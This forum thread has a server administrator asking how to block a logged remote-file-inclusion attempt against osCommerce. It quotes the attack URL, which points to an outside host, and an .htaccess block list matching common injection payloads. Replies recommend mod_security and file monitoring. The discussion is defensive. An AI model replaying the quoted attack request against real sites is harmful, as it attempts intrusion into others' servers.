LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Server
User Name
Password
Linux - Server This forum is for the discussion of Linux Software used in a server related context.

Notices


Reply
  Search this Thread
Old 01-19-2011, 07:21 AM   #1
angel115
Member
 
Registered: Jul 2005
Location: France / Ireland
Distribution: Debian mainly, and Ubuntu
Posts: 537

Rep: Reputation: 79
How to Block attacks "http://213.246.61.125:2082/index.html?" and similar.


Hello there,

Today I've found several attempt to access the following url on my website:
/index.php?file-download=http://213.246.61.125:2082/index.html?

After googleing a bit it seems that in some cases, using this attack, the bag guy is able to change the code in some of your files.

it also seems to affect only a certain version of oScommerce.

I don't use oScommerce, so I do believe that I'm on the safe side, but it's not the first time that I see some similar attempt of attack on my website.

So to protect my self I was wondering if using .htaccess restriction would be enough?

At the moment I'm using the following: (that I've found on an other forum)
Code:
########## Begin - Rewrite rules to block out some common exploits
#
RewriteEngine on
Options +FollowSymLinks
#
# Block out any script trying to base64_encode
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Block hackers trying a redirect via cPath
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC]
#Block attempt to redirect to /self
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC]
#
RewriteRule ^.* - [F]
#
########## End - Rewrite rules to block out some common exploits
But I do think that these rewrite string are more specificity write to protect oScommerce site.

Any advice on how to protect my web site from such attach and similar?

Best regards,
Angel.

Last edited by angel115; 01-19-2011 at 07:33 AM.
 
Old 01-19-2011, 07:51 AM   #2
GlennsPref
Senior Member
 
Registered: Apr 2004
Location: Brisbane, Australia
Distribution: Devuan
Posts: 3,412
Blog Entries: 33

Rep: Reputation: 222Reputation: 222Reputation: 222
Hi, it's very easy to get concerned with possible breaches in you web security.

But warnings and errors in your logs are just that, warnings and errors.

If anything is done you will get "failed" messages.

look again and see if that is you problem.

Regards Glenn
 
Old 01-19-2011, 08:49 AM   #3
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Rep: Reputation: 420Reputation: 420Reputation: 420Reputation: 420Reputation: 420
In addition to what Glenn suggested, you might want to consider some pre-emptive moves. Something like mod_security might not be a bad idea, and you might want to consider some active file monitoring like Aide or Samhain. However, for those to really be useful, you need to trust your current installation completely.
 
Old 01-19-2011, 09:37 AM   #4
angel115
Member
 
Registered: Jul 2005
Location: France / Ireland
Distribution: Debian mainly, and Ubuntu
Posts: 537

Original Poster
Rep: Reputation: 79
Thanks to you both.

I'll follow your recommandation.

PS Hangdog42: I have to check, but I think I already enable "mod_security"

Thanks,
Angel.
 
Old 01-19-2011, 01:28 PM   #5
angel115
Member
 
Registered: Jul 2005
Location: France / Ireland
Distribution: Debian mainly, and Ubuntu
Posts: 537

Original Poster
Rep: Reputation: 79
I've found a fairly good resource on symantec web site on how to use .htaccess in an efficient way:
http://www.symantec.com/connect/arti...ccess-part-one
 
Old 01-19-2011, 03:19 PM   #6
GlennsPref
Senior Member
 
Registered: Apr 2004
Location: Brisbane, Australia
Distribution: Devuan
Posts: 3,412
Blog Entries: 33

Rep: Reputation: 222Reputation: 222Reputation: 222
Hi, just another thought, I used tutes similar to and including this Magazine article to get my system ironed out.

Keeping Your Linux System Secure
ref. http://www.linux.org/lessons/advanced/x313.html

Cheers and all the best, Glenn
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Bluetooth problem:"opd[246]: Failed to register BtOBEX server on RFCOMM channel 10. " kiba09 Linux - General 3 07-20-2009 05:39 AM
"Forbidden / You don't have permission to access /~user/index.html on this server." honglin_8 Linux - Newbie 8 10-30-2007 09:41 AM
LXer: <a href="http://blogs.zdnet.com/threatchaos/index.php?p=311">Why is Linux more secure than Windows?</a> LXer Syndicated Linux News 0 04-18-2006 03:03 PM
visit linux web from windows, the site couldn't execute "index.html" automaticlly Meditator Linux - Networking 3 03-20-2004 12:10 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Server

All times are GMT -5. The time now is 06:38 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration